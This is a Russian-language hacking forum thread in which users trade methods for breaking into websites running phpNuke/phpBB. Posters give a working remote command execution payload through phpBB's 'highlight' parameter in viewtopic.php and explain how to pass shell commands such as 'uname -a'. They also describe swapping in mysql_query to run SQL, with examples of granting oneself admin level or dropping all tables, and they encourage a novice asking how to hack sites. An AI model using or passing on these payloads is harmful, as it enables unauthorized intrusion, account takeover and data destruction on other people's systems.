|
phpnuke
Зашёл на портал на движке phpпуке
Допустим www.mega-lol.net Стырил пароль от базы и имя &highlight=%2527.$poster=$dbpass.%2527 &highlight=%2527.$poster=$dbname.%2527 Как мне быть дальше? |
Так. Серьезно. Ответь, сколько ты куриш?
Ты зря этим делом занимаешься, если бы не курил ПЛАН, знал бы что highlight в phpBB )) Если ты там стырил пас от MySQL, то теперь делай так Напиши его в блокнот Закрой блокнот Не сохраняй изменения Забей на пароль Теперь используй сплойт чтобы выполнить произвольные комманды на уязвимой с-ме!)) Уже писал МИЛИОН раз про highlight. И ещё напишу viewtopic.php?xxx=uname -a&t=[TOPIC]&highlight=%2527.system($_GET[xxx]).include%2527 Незабудь вместо [TOPIC] поставить номер топика |
Спасибо, неленивый ты :)
Я некурю)))) |
Спасибо ))
|
xxx- эт что?
uname- эт что? |
xxx - это параметр в строке в который нужно писать команду, ее запустит system()
uname - это команда nix показывающая версию ОС и другое. с параметром a - версию Linux |
Ребята прошу вас объясните мне ламеру, как нужнно взламывать сайты на Phpnuke.
как ни стараюсь не получается. прошу вас помггите. |
1. ага... сейчас остались критические уязвимости в нюке 7,5 7,6 ? На секьюрити только XSS и то херь :(
2. 2KEZ, При создании нюка создаётся профиль базового админа форума (редактирование его параметров запрещено) Всё его данные находятся в бд определённой яцейке (название непоню сейчас точно) Можно ли с помощью &highlight=%2527.system($_GET[xxx]).include%2527 Очистить данные этой ячейки, тем самым введя supersite.ru/admin.pnp создать по новой базового администратора? Danke... =) |
Какие ячейки? Я тебе про ПЛАН говорил? )) Ладно шучу ))
Вообщем если у тебя есть шелл (HTTP) я незнаю о каких админах ты можешь говорить... Ты можешь например делать вместо system($_GET[xxx]) mysql_query($_GET[xxx]) и вместо xxx писать SQL команды Например UPDATE phpbb_users SET user_level=1 WHERE user_id=[ТВОЙ ID] Или стереть все таблицы... А phpNuke ТУТ ВООБЩЕ НЕ ПРИ ЧЕМ. Разве что phpBB бывает модулем в нюке. |
Занимательно....., Спасибо!
|
| Время: 03:51 |